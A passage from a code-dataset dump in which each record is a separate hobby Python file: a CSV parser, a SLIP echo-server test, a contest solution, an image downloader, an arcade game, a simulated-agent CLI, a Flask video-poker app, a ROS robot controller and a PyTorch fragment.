OUT_FILE_NAME)\n","repo_name":"mikiSpoko200/artificial-intelligence","sub_path":"sheet01/ex2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70513768872","text":"import csv\n\n\nclass ReadCSV(object):\n def __init__(self):\n self.knol = {}\n self.knol_ = {} # dictionary of columns of csv\n self.data = []\n self.data_ = []\n self.dot = None\n self.knol_all = {} # dict of dicts of knol\n\n @staticmethod\n def read_csv(directory, csv_name):\n path = directory + '/' + csv_name\n csv_f = open(path, 'rU')\n csv_obj = csv.reader(csv_f)\n return csv_name.split('.')[0], csv_obj\n\n def read_csv_contents(self, directory, csv_name):\n self.data = []\n self.data_ = []\n self.knol = {}\n self.knol_ = {}\n path = directory + '/' + csv_name\n csv_f = open(path, 'rU')\n f = csv.reader(csv_f)\n for i, row in enumerate(f):\n\n if i == 0:\n for j, heading in enumerate(row):\n self.knol[str(j) + '_' + heading] = None\n else:\n self.data.append(row)\n\n cols = len(self.data[0])\n cnt = 0\n\n while not cnt > cols - 1:\n temp = []\n for row in self.data:\n temp.append(row[cnt])\n self.data_.append(temp)\n cnt += 1\n\n for k, v in self.knol.iteritems():\n for i, lst in enumerate(self.data_):\n if i == int(k[0]):\n self.knol_[k[2:]] = lst\n self.knol_all[csv_name] = self.knol_","repo_name":"arunenigma/CSV_to_Block_Diagram_Generator","sub_path":"read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31112259548","text":"from multiprocessing import Pipe, Process\nimport socket\nfrom socketserver import TCPServer\nimport pytest\nfrom sliplib import SlipRequestHandler, SlipSocket\n\n\nclass SlipEchoHandler(SlipRequestHandler):\n \"\"\"SLIP request handler that echoes the received message, but with the bytes in reversed order.\"\"\"\n def handle(self):\n while True:\n message = self.request.recv_msg()\n if not message:\n break\n # Reverse the order of the bytes and send it back.\n data_to_send = bytes(reversed(message))\n self.request.send_msg(data_to_send)\n\n\nclass SlipEchoServer: # pylint: disable=too-few-public-methods\n \"\"\"Execution helper for the echo server. Sends the server address back over the pipe.\"\"\"\n\n server_data = {\n socket.AF_INET: (TCPServer, '127.0.0.1'),\n socket.AF_INET6: (type('TCPServerIPv6', (TCPServer,), {'address_family': socket.AF_INET6}), '::1'),\n }\n\n def __init__(self, address_family, pipe):\n server_class, localhost = self.server_data[address_family]\n self.server = server_class((localhost, 0), SlipEchoHandler)\n pipe.send(self.server.server_address)\n self.server.handle_request()\n\n\nclass SlipEchoClient:\n \"\"\"Client for the SLIP echo server\"\"\"\n def __init__(self, address):\n self.sock = SlipSocket.create_connection(address)\n\n def echo(self, msg):\n \"\"\"Send message to the SLIP server and returns the response.\"\"\"\n self.sock.send_msg(msg)\n return self.sock.recv_msg()\n\n def close(self):\n \"\"\"Close the SLIP socket\"\"\"\n self.sock.close()\n\n\nclass TestEchoServer:\n \"\"\"Test for the SLIP echo server\"\"\"\n @pytest.fixture(autouse=True, params=[socket.AF_INET, socket.AF_INET6])\n def setup(self, request, capfd):\n \"\"\"Prepare the server and client\"\"\"\n near, far = Pipe()\n address_family = request.param\n self.server = Process(target=SlipEchoServer, args=(address_family, far))\n self.server.start()\n address_available = near.poll(1.5) # AppVeyor sometimes takes a long time to run the server.\n if address_available:\n server_address = near.recv()\n else:\n captured = capfd.readouterr()\n pytest.fail(captured.err)\n self.client = SlipEchoClient(server_address)\n yield\n self.client.close()\n self.server.join()\n\n def test_echo_server(self):\n \"\"\"Test the echo server\"\"\"\n data = [\n (b'hallo', b'ollah'),\n (b'goodbye', b'eybdoog')\n ]\n for snd_msg, expected_reply in data:\n assert self.client.echo(snd_msg) == expected_reply\n","repo_name":"rhjdjong/SlipLib","sub_path":"tests/integration/test_server_client.py","file_name":"test_server_client.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"5286443802","text":"from collections import Counter, defaultdict, deque\nfrom string import ascii_uppercase\n\n\ndef findBestPath(s, t, ct, tc, listauxs, listauxt):\n # T ->\n #B - A\n #s - t\n\n # print(f'fs {s} - ft {t} - ct {ct}')\n\n count = 1\n dd = defaultdict(lambda: defaultdict(int))\n if t in ct[s]:\n # print(f't {t} in ct[s] {ct[s]}')\n return count\n # if len(ct[s]) == 0:\n # return -1\n # if len(tc[t]) == 0:\n # return -1\n else:\n results = deque()\n results.clear()\n for ssub in ct[s]:\n\n if ssub in listauxs and t in listauxt:\n continue\n # print(ssub, t)\n listauxs.append(ssub)\n listauxt.append(t)\n if not dd[ssub][t]:\n count2 = findBestPath(\n ssub, t, ct, tc, listauxs, listauxt)\n dd[ssub][t] = count2\n else:\n count2 = dd[ssub][t]\n\n results.append(count2)\n if len(results) > 0:\n if len(list(filter(lambda x: x != -1, results))) > 0:\n mini = min(filter(lambda x: x != -1, results))\n count = mini+count\n print(s, t, count)\n return(count)\n else:\n return(-1)\n else:\n return(-1)\n return(-1)\n\n\ndef consistency():\n # VOWELS = 'AEIOU'+'asdf'\n S = input()\n K = int(input())\n\n LL = deque()\n LA = deque()\n LT = deque()\n ct = defaultdict(str)\n tc = defaultdict(str)\n for i in (range(0, K)):\n LL.append(input())\n ct[LL[i][0]] = LL[i][1]+ct[LL[i][0]]\n tc[LL[i][1]] = LL[i][0]+tc[LL[i][1]]\n # LA.append(LL[i][0])\n # LT.append(LL[i][1])\n fullS = S\n # fullS = ascii_uppercase\n for s in tc:\n fullS += s\n countLetters = Counter(fullS).most_common()\n count = defaultdict(lambda: defaultdict(int))\n # print(findBestPath('A', 'Z', ct, tc))\n som = 0\n initial = 1\n results = deque()\n # c = findBestPath('O', 'X', {'N': 'XI', 'O': 'IE', 'E': 'W', 'F': 'NE', 'X': 'W', 'I': ''}, {\n # 'I': 'ON', 'E': 'FO', 'X': 'N', 'W': 'XE', 'N': 'F', 'F': '', 'O': ''})\n # return '1'\n for t in countLetters:\n som = 0\n for s in S:\n if t[0] == s:\n continue\n\n # count[t[0]][s] = findBestPath(s, t[0], ct, tc)\n # print(f'{s}-{t[0]}')\n c = findBestPath(s, t[0], ct, tc, deque(), deque())\n # print(f'{s}-{t[0]}=>c={c}')\n # print(f'tc={tc}')\n if c > 0:\n som += c\n else:\n som = -1\n break\n results.append(som)\n\n # print(i[0])\n # for k in (temp):\n # for i in (temp):\n # for j in temp[i]:\n # return('a')\n # return(results)\n x = list(filter(lambda x: x != -1, results))\n if len(x) == 0:\n result = -1\n else:\n result = min(x)\n return(results)\n\n\nfor case in range(int(input())):\n print(f'Case #{case+1}: {consistency()}')\n","repo_name":"irgot/FBHC","sub_path":"2021/Consistency C2.py","file_name":"Consistency C2.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10531618124","text":"import requests\nimport csv\n\nlista = {}\ncount=0\nwith open('smart.csv', newline='') as csvread:\n\tcsvfile=csv.reader(csvread,delimiter=',')\n\t\n\tfor row in csvfile:\n\t\t#print(str(row[0]) +'works in the'+ str(row[1]) )\n\t\t#print(str(row))\n\t\tlista[str(row[0])] = str(row[0])\n\t\tcount += 1\n\tprint('Procesados '+ str(count) +' enlaces.')\n\nprint(str(lista))\nprint('______________________________________________________________________________')\n\nprint(count)\nfor i in lista:\n\tcode = i\n\tmtx=i.split(',')\n\timagen = requests.get(mtx[1]).content\n\twith open('c:/temp/DesFotos/Smartphones/' + mtx[0] + '.jpg', 'wb') as handler:\n\t\thandler.write(imagen)\nprint('Proceso finalizado.')\n","repo_name":"Rex0747/pythonUtils","sub_path":"DescargaImagenes.py","file_name":"DescargaImagenes.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16362058722","text":"import arcade\nimport os\nimport math\n\nfrom entities.player_character import PlayerCharacter\nfrom helpers.constants import Constants\nfrom input.keys import Keys\nfrom entities.enemies.robot import RobotEnemy\nfrom entities.enemies.zombie import ZombieEnemy\n\n\nclass GameView(arcade.View):\n\n def __init__(self):\n super().__init__()\n\n file_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(file_path)\n\n self.handle_input = Keys()\n\n self.left_pressed = False\n self.right_pressed = False\n self.up_pressed = False\n self.down_pressed = False\n self.shoot_pressed = False\n self.jump_needs_reset = False\n\n self.tile_map = None\n self.scene = None\n self.player_sprite = None\n self.physics_engine = None\n self.camera = None\n self.gui_camera = None\n\n self.end_of_map = 0\n self.score = 0\n self.can_shoot = False\n self.shoot_timer = 0\n\n self.collect_coin_sound = arcade.load_sound(\n \":resources:sounds/coin1.wav\")\n self.jump_sound = arcade.load_sound(\":resources:sounds/jump1.wav\")\n self.game_over = arcade.load_sound(\":resources:sounds/gameover1.wav\")\n self.shoot_sound = arcade.load_sound(\":resources:sounds/hurt5.wav\")\n self.hit_sound = arcade.load_sound(\":resources:sounds/hit5.wav\")\n\n def setup(self):\n self.camera = arcade.Camera(self.window.width, self.window.height)\n self.gui_camera = arcade.Camera(self.window.width, self.window.height)\n\n map_name = \":resources:tiled_maps/map_with_ladders.json\"\n\n layer_options = {\n Constants.LAYER_NAME_PLATFORMS: {\n \"use_spatial_hash\": True\n },\n Constants.LAYER_NAME_MOVING_PLATFORMS: {\n \"use_spatial_hash\": True\n },\n Constants.LAYER_NAME_LADDERS: {\n \"use_spatial_hash\": True\n },\n Constants.LAYER_NAME_COINS: {\n \"use_spatial_hash\": True\n },\n }\n\n self.tile_map = arcade.load_tilemap(\n map_name, Constants.TILE_SCALING, layer_options)\n # Initiate New Scene with our TileMap, this will automatically add all layers\n # from the map as SpriteLists in the scene in the proper order.\n self.scene = arcade.Scene.from_tilemap(self.tile_map)\n\n self.score = 0\n self.can_shoot = True\n self.shoot_timer = 0\n\n # Create player\n self.player_sprite = PlayerCharacter()\n self.player_sprite.center_x = (\n self.tile_map.tile_width * Constants.TILE_SCALING * Constants.PLAYER_START_X\n )\n self.player_sprite.center_y = (\n self.tile_map.tile_height * Constants.TILE_SCALING * Constants.PLAYER_START_Y\n )\n self.scene.add_sprite(Constants.LAYER_NAME_PLAYER, self.player_sprite)\n\n self.end_of_map = self.tile_map.width * Constants.GRID_PIXEL_SIZE\n\n enemies_layer = self.tile_map.object_lists[Constants.LAYER_NAME_ENEMIES]\n\n for obj in enemies_layer:\n cartesian = self.tile_map.get_cartesian(obj.shape[0], obj.shape[1])\n enemy_type = obj.properties[\"type\"]\n if enemy_type == \"robot\":\n enemy = RobotEnemy()\n elif enemy_type == \"zombie\":\n enemy = ZombieEnemy()\n enemy.center_x = math.floor(\n (cartesian[0] * Constants.TILE_SCALING *\n self.tile_map.tile_width)\n )\n enemy.center_y = math.floor(\n (cartesian[1] + 1) *\n (Constants.TILE_SCALING * self.tile_map.tile_height)\n )\n\n if \"boundary_left\" in obj.properties:\n enemy.boundary_left = obj.properties[\"boundary_left\"]\n if \"boundary_right\" in obj.properties:\n enemy.boundary_right = obj.properties[\"boundary_right\"]\n if \"change_x\" in obj.properties:\n enemy.change_x = obj.properties[\"change_x\"]\n\n self.scene.add_sprite(Constants.LAYER_NAME_ENEMIES, enemy)\n\n self.scene.add_sprite_list(Constants.LAYER_NAME_BULLETS)\n\n if self.tile_map.background_color:\n arcade.set_background_color(self.tile_map.background_color)\n\n self.physics_engine = arcade.PhysicsEnginePlatformer(\n self.player_sprite,\n platforms=self.scene[Constants.LAYER_NAME_MOVING_PLATFORMS],\n gravity_constant=Constants.GRAVITY,\n ladders=self.scene[Constants.LAYER_NAME_LADDERS],\n walls=self.scene[Constants.LAYER_NAME_PLATFORMS]\n )\n\n def on_show_view(self):\n self.setup()\n\n def on_draw(self):\n\n self.clear()\n\n self.camera.use()\n self.scene.draw()\n self.gui_camera.use()\n\n score_text = f\"Score: {self.score}\"\n arcade.draw_text(\n score_text,\n 10,\n 10,\n arcade.csscolor.BLACK,\n 18\n )\n\n def on_update(self, delta_time):\n\n self.physics_engine.update()\n\n if self.physics_engine.can_jump():\n self.player_sprite.jumping = False\n else:\n self.player_sprite.jumping = True\n \n if self.physics_engine.is_on_ladder() and not self.physics_engine.can_jump():\n self.player_spite.is_on_ladder = True\n self.handle_input.process_keychange(self)\n else:\n self.player_sprite.is_on_ladder = False\n self.handle_input.process_keychange(self)\n \n if self.can_shoot:\n if self.shoot_pressed:\n arcade.play_sound(self.shoot_sound)\n bullet = arcade.Sprite(\":resources:images/space_shooter/laserBlue01.png\", Constants.SPRITE_SCALING_LASER)\n if self.player_sprite.facing_direction == Constants.RIGHT_FACING:\n bullet.change_x += Constants.BULLET_SPEED\n else:\n bullet.change_x -= Constants.BULLET_SPEED\n \n bullet.center_x = self.player_sprite.center_x\n bullet.center_y = self.player_sprite.center_y\n \n self.scene.add_sprite(Constants.LAYER_NAME_BULLETS, bullet)\n \n self.can_shoot = False\n else:\n self.shoot_timer += 1\n if self.shoot_timer == Constants.SHOOT_SPEED:\n self.can_shoot = True\n self.shoot_timer = 0\n \n # Update animations\n self.scene.update_animation(\n delta_time,\n [\n Constants.LAYER_NAME_COINS,\n Constants.LAYER_NAME_BACKGROUND,\n Constants.LAYER_NAME_PLAYER,\n Constants.LAYER_NAME_ENEMIES,\n ],\n )\n\n # Update moving platforms, enemies and bullets\n self.scene.update(\n [Constants.LAYER_NAME_ENEMIES, Constants.LAYER_NAME_MOVING_PLATFORMS,\n Constants.LAYER_NAME_BULLETS]\n )\n\n # See if enemy hit a boundary and needs to reverse direction\n for enemy in self.scene[Constants.LAYER_NAME_ENEMIES]:\n if enemy.boundary_right and enemy.right > enemy.boundary_right and enemy.change_x > 0:\n enemy.change_x *= -1\n\n if enemy.boundary_left and enemy.left < enemy.boundary_left and enemy.change_x < 0:\n enemy.change_x *= -1\n\n # Check for bullet collisions with enemies or platforms\n for bullet in self.scene[Constants.LAYER_NAME_BULLETS]:\n hit_list = arcade.check_for_collision_with_lists(\n bullet, \n [\n self.scene[Constants.LAYER_NAME_ENEMIES], \n self.scene[Constants.LAYER_NAME_PLATFORMS],\n self.scene[Constants.LAYER_NAME_MOVING_PLATFORMS]\n ]\n )\n \n if hit_list:\n bullet.remove_from_sprite_lists() \n for collision in hit_list:\n if self.scene[Constants.LAYER_NAME_ENEMIES] in collision.sprite_lists:\n collision.health -= Constants.BULLET_DAMAGE\n if collision.health <= 0:\n collision.remove_from_sprite_lists()\n self.score += 10\n arcade.play_sound(self.hit_sound)\n return\n \n # Remove bullet if off screen\n if bullet.right < 0 or bullet.left > (self.tile_map.width * self.tile_map.tile_width) * Constants.TILE_SCALING:\n bullet.remove_from_sprite_lists()\n \n player_collision_list = arcade.check_for_collision_with_lists(\n self.player_sprite,\n [\n self.scene[Constants.LAYER_NAME_COINS],\n self.scene[Constants.LAYER_NAME_ENEMIES]\n ]\n )\n\n for collision in player_collision_list:\n if self.scene[Constants.LAYER_NAME_ENEMIES] in collision.sprite_lists:\n arcade.play_sound(self.game_over)\n game_view = GameOverView()\n self.window.show_view(game_view)\n return\n else:\n if \"Points\" not in collision.properties:\n print(\"Warning, collected a coin without a Points property\")\n else:\n points = int(collision.properties[\"Points\"])\n self.score += points\n # Remove the coin\n collision.remove_from_sprite_lists()\n arcade.play_sound(self.collect_coin_sound)\n\n self.center_camera_to_player()\n\n def center_camera_to_player(self, speed=0.2):\n screen_center_x = self.camera.scale * (\n self.player_sprite.center_x - (self.camera.viewport_width / 2)\n )\n screen_center_y = self.camera.scale * (\n self.player_sprite.center_y - (self.camera.viewport_height / 2)\n )\n\n if screen_center_x < 0:\n screen_center_x = 0\n if screen_center_y < 0:\n screen_center_y = 0\n\n player_centered = (screen_center_x, screen_center_y)\n\n self.camera.move_to(player_centered, speed)\n\n def process_keychange(self):\n self.handle_input.process_keychange(self)\n\n def on_key_press(self, key, modifiers):\n self.handle_input.on_key_press(self, key, modifiers)\n\n def on_key_release(self, key, modifiers):\n self.handle_input.on_key_release(self, key, modifiers)\n\n def on_mouse_scroll(self, x, y, scroll_x, scroll_y):\n self.handle_input.on_mouse_scroll(self, x, y, scroll_x, scroll_y)\n\n\nclass GameOverView(arcade.View):\n\n def on_show_view(self):\n arcade.set_background_color(arcade.color.BLACK)\n\n def on_draw(self):\n self.clear()\n\n arcade.draw_text(\n \"Game Over - Click to restart\",\n Constants.SCREEN_WIDTH / 2,\n Constants.SCREEN_HEIGHT / 2,\n arcade.color.WHITE,\n 30,\n anchor_x=\"center\"\n )\n\n def on_mouse_press(self, _x, _y, _button, _modifiers):\n game_view = GameView()\n self.window.show_view(game_view)\n","repo_name":"Mauw94/py-arcade-zombie-survival","sub_path":"source/views/game_view.py","file_name":"game_view.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43654871256","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport re\nfrom os.path import join\nfrom typing import Optional as Option\nfrom decimal import Decimal\n\nimport click\n\nfrom .Agent import Agent\nfrom .AgentManager import AgentManager\n\n\n@click.group()\n@click.version_option(prog_name='fake_agent', version='0.2.0')\ndef cli() -> None:\n pass\n\n\n@click.option(\n '-n', '--name',\n help='Specify a unique agent to run.',\n type=str\n)\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to load the agent(s).'\n)\n@click.option(\n '-h', '--host',\n help='Select only the agents belonging to a specific host.'\n)\n@cli.command()\ndef run(\n name: Option[str],\n directory: str,\n host: Option[str]\n) -> None:\n \"\"\"Run the specified agent(s)\"\"\"\n if name:\n agent = Agent.from_directory(join(directory, name))\n if host and agent.host != host:\n click.echo(f\"Agent host {agent.host} does not match {host}\")\n return\n agent.start()\n agent.join()\n else:\n manager = AgentManager(directory, host)\n manager.start()\n\n\n@click.option(\n '-h', '--hostname',\n default='localhost',\n help='The IAM server IP or FQDN.'\n)\n@click.option(\n '--port',\n default=None,\n help='The port on which to contact the IAM server. Defaults to 80 or 443 if ssl is specified.',\n type=int\n)\n@click.option(\n '--ssl/--no-ssl',\n default=False,\n help='Whether to use a secure connection when contacting the IAM server.'\n)\n@click.option(\n '-u', '--username',\n prompt=True,\n help='Server administrator username.'\n)\n@click.option(\n '-p', '--password',\n prompt=True,\n help='Server administrator password.'\n)\n@click.option(\n '-n', '--name',\n help='The agent name.'\n)\n@click.option(\n '-s', '--speed',\n help='The speed factor, influences the time taken for an agent to fill up.',\n default=\"1.5:0.5\"\n)\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to save the agent(s).'\n)\n@click.option(\n '-c', '--count',\n default=1,\n help='The number of generated agents.'\n)\n@click.argument('location')\n@cli.command()\ndef generate(\n hostname: str,\n port: Option[int],\n ssl: bool,\n username: str,\n password: str,\n name: str,\n speed: float,\n directory: str,\n count: int,\n location: str,\n) -> None:\n \"\"\"\n Generate (a) fake trash can(s) and publish it/these to the specified server\n or localhost:80 if the server is left unspecified.\n\n LOCATION must be a 'latitude:longitude:radius' location. Specifies the\n geographical position around which the trash can shall be located.\n \"\"\"\n if count < 1:\n return\n\n port = port if port else (443 if ssl else 80)\n\n lat, lon, radius = map(Decimal, location.split(':'))\n ids = (username, password)\n location_hint = (lat, lon, radius)\n speed, delta = map(float, speed.split(\":\"))\n\n if count == 1:\n agent = Agent.generate(ids, location_hint, name, directory, hostname)\n click.echo(f\"Agent {agent.name} generated in {agent.root}!\", err=True)\n click.echo(agent.name)\n return\n\n for n in range(1, count+1):\n agent = Agent.generate(\n ids, location_hint, f\"{name}_{n}\", directory, hostname, port, ssl,\n speed=(speed, delta)\n )\n click.echo(f\"Agent {agent.name} generated in {directory}!\", err=True)\n click.echo(agent.name)\n\n click.echo(f\"Generated {count} agents\", err=True)\n\n\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to load the agent(s).'\n)\n@click.option(\n '-h', '--host',\n help='Select only the agents belonging to a specific host'\n)\n@cli.command()\ndef show(directory: str, host: Option[str]):\n \"\"\"Lists the available agents\"\"\"\n\n host_regex = re.compile(host) if host else None\n manager = AgentManager(directory)\n agents = []\n hosts = []\n\n for agent in manager.agents:\n if host is None or host_regex.match(agent.host):\n agents.append(agent)\n if agent.host not in hosts:\n hosts.append(agent.host)\n click.echo(f\"{agent.name}@{agent.host}: speed={agent.speed}\")\n\n click.echo(f\"{len(agents)} agents on {len(hosts)} host(s).\")\n\n\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to load the agent(s).'\n)\n@click.option(\n '-h', '--host',\n help='Select only the agents belonging to a specific host.'\n)\n@click.option(\n '-n', '--name',\n help='The agent name.'\n)\n@click.option(\n '--stale/--no-stale',\n default=True,\n help='Whether to consider only agents which are no longer active.'\n)\n@click.option(\n '-u', '--username',\n prompt=True,\n help='Server administrator username.'\n)\n@click.option(\n '-p', '--password',\n prompt=True,\n help='Server administrator password.'\n)\n@cli.command()\ndef remove(directory, host, name, stale, username, password):\n \"\"\"Remove the specified agent(s)\"\"\"\n ids = (username, password)\n if name:\n agent = Agent.from_directory(join(directory, name))\n if host and agent.host != host:\n click.echo(f\"Agent host {agent.host} does not match {host}\")\n return\n agent.remove(ids, stale)\n else:\n manager = AgentManager(directory, host)\n for agent in manager.agents:\n agent.remove(ids, stale)\n\n\nif __name__ == '__main__':\n cli.main(args=sys.argv[1:], prog_name=\"fake_agent\")\n","repo_name":"LeGroupeDeFer/IAM","sub_path":"fake_agent/fake_agent/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27703970370","text":"from flask import render_template, request, url_for, redirect, flash, session\nimport random\nfrom modules.gain import partie\nfrom modules.util import tirage, mapCardsToImg\n\nclass Controller:\n\n def __init__(self):\n pass\n\n def homepage(self):\n \"\"\"\n Fonction affichant la page d'accueil de l'interface Web\n\n Son état change selon le montant de la banque\n \"\"\"\n if \"bankroll\" in session and session[\"bankroll\"] == 0:\n flash('Banque épuisée : partie terminée !','error')\n del session[\"bankroll\"]\n return render_template(\"homepage.html\")\n\n\n\n\n def restart(self):\n \"\"\"\n Réinitialise le vidéo-poker : la banque sera donc supprimée\n \"\"\"\n del session[\"bankroll\"]\n return redirect('/')\n\n\n\n def start_video_poker(self):\n \"\"\"\n Fonction prenant en compte le montant de la banque,\n puis de la mise afin de tirer des cartes à l'utilisateur\n\n \"\"\"\n initial_deck = ['2-h','3-h','4-h','5-h','6-h','7-h','8-h','9-h','10-h','J-h','Q-h','K-h','A-h','2-d','3-d','4-d','5-d','6-d','7-d','8-d','9-d','10-d','J-d','Q-d','K-d','A-d','2-c','3-c','4-c','5-c','6-c','7-c','8-c','9-c','10-c','J-c','Q-c','K-c','A-c','2-s','3-s','4-s','5-s','6-s','7-s','8-s','9-s','10-s','J-s','Q-s','K-s','A-s']\n \n #on récupère le montant de la banque et la mise depuis le formulaire\n #si le montant de la banque existe déjà en session, on le récupère\n bank,mise = (request.form[\"bank\"] if (\"bankroll\" not in session) else session[\"bankroll\"]), request.form[\"mise\"]\n \n if bank == 0:\n return redirect('/')\n if int(bank) - int(mise) < 0:\n flash('Mise trop élevée : veuillez réessayer', 'error')\n return redirect('/')\n else:\n #on mélange les cartes\n cartes_tirees,new_deck = tirage(initial_deck)\n session[\"bankroll\"] = int(bank) - int(mise)\n session[\"mise\"] = int(mise)\n #on sauve le deck mélangé en session pour le prochain tirage\n session[\"deck\"] = new_deck\n #on renvoie le template qui propose les cartes à garder (on associe chaque carte à son image correspondante pour l'affichage -> mapCardsToImg)\n return render_template('board.html',deck=session[\"deck\"],cartes=mapCardsToImg(cartes_tirees)), 201\n\n\n\n def second_shuffle(self):\n \"\"\"\n Fonction permettant de faire un second tirage\n mais cette fois-ci pour tester les différentes combinaisons gagnates\n\n Le montant de la banque, capturée en session sera modifié ou non selon le résultat (oui si gagnant)\n \"\"\"\n #récupération des cartes que le joueur souhaite garder\n choix_joueur: list = request.form.getlist(\"carte[]\")\n #pour récupérer le deck précédemment modifié\n cartes_tirees,new_deck = tirage(session[\"deck\"],choix_joueur)\n #on décompose chaque carte en un dictionnaire contenant la couleur et la valeur\n decomposition_cartes = [ dict({ \"couleur\": ensemble[1], \"valeur\": ensemble[0] }) for ensemble in [carte.split(\"-\") for carte in cartes_tirees ]]\n session[\"bankroll\"],resultat = partie(session[\"mise\"],session[\"bankroll\"],decomposition_cartes)\n \n return render_template('board.html',deck=new_deck,cartes=mapCardsToImg(cartes_tirees),resultat=resultat),201","repo_name":"ii02735/ipssi_projet_pocker","sub_path":"modules/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8919807970","text":"#!/usr/bin/env python\n\nimport rospy\nimport time\nimport numpy as np\nfrom controlador import controller\nfrom dynamic_reconfigure.server import Server\nfrom rycsv_kobuki_localization.cfg import controllerConfig\nfrom geometry_msgs.msg import Twist\n\ndef angle_between(p0,p1,p2):\n v0 = np.array(p1) - np.array(p0)\n v1 = np.array(p2) - np.array(p0)\n\n angle = np.math.atan2(np.linalg.det([v0,v1]),np.dot(v0,v1))\n return angle\n\ndef xy2traj(dots):\n \"\"\"\n From xy coordinates generates a complete trajectory\n\n Takes x,y coordinates of a trajectory and calculates x,y,theta coordinates\n with intermidiate points that assure twists of 90\n \n Parameters\n ----------\n dots : list of [x,y]\n Dots [[x_0,y_0],[x_1,y_1],...]\n Motion : control.Motion\n Class where the control and motion is settled\n\n Returns\n -------\n list of [x,y,theta]\n Complete trajectory\n\n \"\"\"\n traj = []\n last_dot = 0 \n last_x = 0\n last_y = 0\n for count, dot in enumerate(dots):\n x = dot[0]\n y = dot[1]\n if (count == 0) :\n theta = 90\n traj.append([x,y,theta]) #Radians to deg\n else:\n theta = angle_between(last_dot,[last_x+1,last_y],dot)\n traj.append([last_x,last_y,np.rad2deg(theta)])\n traj.append([x,y,np.rad2deg(theta)])\n last_dot = dot\n last_theta = theta\n last_x = x\n last_y = y\n return traj\n\n#Callback function from dynamic reconfigure\ndef callback(config, level):\n global dyn_flag\n dyn_flag = 1\n print('Param change requested...')\n return config\n \n\nif __name__ == \"__main__\":\n\n #Node initialization\n rospy.init_node(\"motion_control\", anonymous = False)\n rate = rospy.Rate(50) # 50 Hz ROS\n\n #Controller init\n kobuki_controller = controller()\n\n #Dynamic reconfigure flag\n dyn_flag = 0\n\n #Dynamic reconfigure server initialization\n srv = Server(controllerConfig, callback)\n\n #Wheel speed publisher\n nameSpeedTopic = \"/mobile_base/commands/velocity\"\n kobuki_speed_pub = rospy.Publisher(nameSpeedTopic, Twist, queue_size=10)\n command = Twist()\n\n #Trajectory dots (No orientation)\n dots = [\n [0, 0], [-3.5, 0], [-3.5, 3.5], [1.5, 3.5],\n [1.5, -1.5], [3.5, -1.5], [3.5, -8.0], \n [-2.5, -8.0], [-2.5, -5.5], [1.5, -5.5], \n [1.5, -3.5], [-1.0, -3.5]\n ]\n\n #Add orientation to trajectory\n traj = xy2traj(dots)\n traj = np.array(traj)\n #Trajectory limits\n goal_id = 0\n dot_count, coord = traj.shape\n\n #Initial point\n kobuki_controller.set_goal(traj[goal_id][0],traj[goal_id][1],traj[goal_id][2])\n print(\"--\")\n print(\"GOAL\")\n print(\"X: \"+str(kobuki_controller.x_goal))\n print(\"Y: \"+str(kobuki_controller.y_goal))\n print(\"Z: \"+str(kobuki_controller.th_goal))\n print(\"--\")\n #Node Loop\n while(not rospy.is_shutdown()):\n \n #Check and change controllers params if requested \n if dyn_flag == 1:\n kobuki_controller.set_controller_params()\n dyn_flag = 0\n\n #Get \"now\" time to syncronize target tf and error tf \n now = rospy.Time.now()\n\n #Broadcast goal TF\n kobuki_controller.broadcast_goal(now)\n\n #Control methods\n kobuki_controller.compute_error(now)\n kobuki_controller.transform_error()\n kobuki_controller.control_speed()\n\n #Publish Speed\n command.linear.x = kobuki_controller.v_out\n command.angular.z = kobuki_controller.w_out\n kobuki_speed_pub.publish(command)\n\n #Check if goal has been reached\n kobuki_controller.check_goal_reached()\n if kobuki_controller.done: \n print(\"Goal has been reached...\")\n print(\"--\")\n goal_id = goal_id+1 #Change point when arrived to goal\n\n if goal_id == dot_count:\n goal_id = goal_id-1 #Wait at last point\n #goal_id = 0 #Go back to initial point\n\n kobuki_controller.set_goal(traj[goal_id][0],traj[goal_id][1],traj[goal_id][2])\n now = rospy.Time.now()\n kobuki_controller.broadcast_goal(now) \n kobuki_controller.compute_error(now)\n\n #Check and change controllers params if requested \n if dyn_flag == 1:\n kobuki_controller.set_controller_params()\n dyn_flag = 0\n \n rate.sleep() #Wait for ROS node cycle\n \n\n\n\n","repo_name":"JurgenHK/RyCSV-Taller-4---Navegacion","sub_path":"scripts/motion_control.py","file_name":"motion_control.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8780250767","text":"import torch\nimport torch.autograd as ag\nimport torch.nn as nn\nimport torch.optim as optim\nimport pdb\nimport torch.utils.data as data\nimport torch.nn.functional as F\nimport sklearn.metrics as metrics\nimport math\nimport numpy as np\n# from utils import pad_sequence, pad_labels, to_var, clip\n\ntorch.cuda.manual_seed(1)\ntorch.manual_seed(1)\n\nclass AttrProxy(object):\n def __init__(self, module, prefix):\n self.module = module\n self.prefix = prefix\n\n def __getitem__(self, i):\n return getattr(self.module, 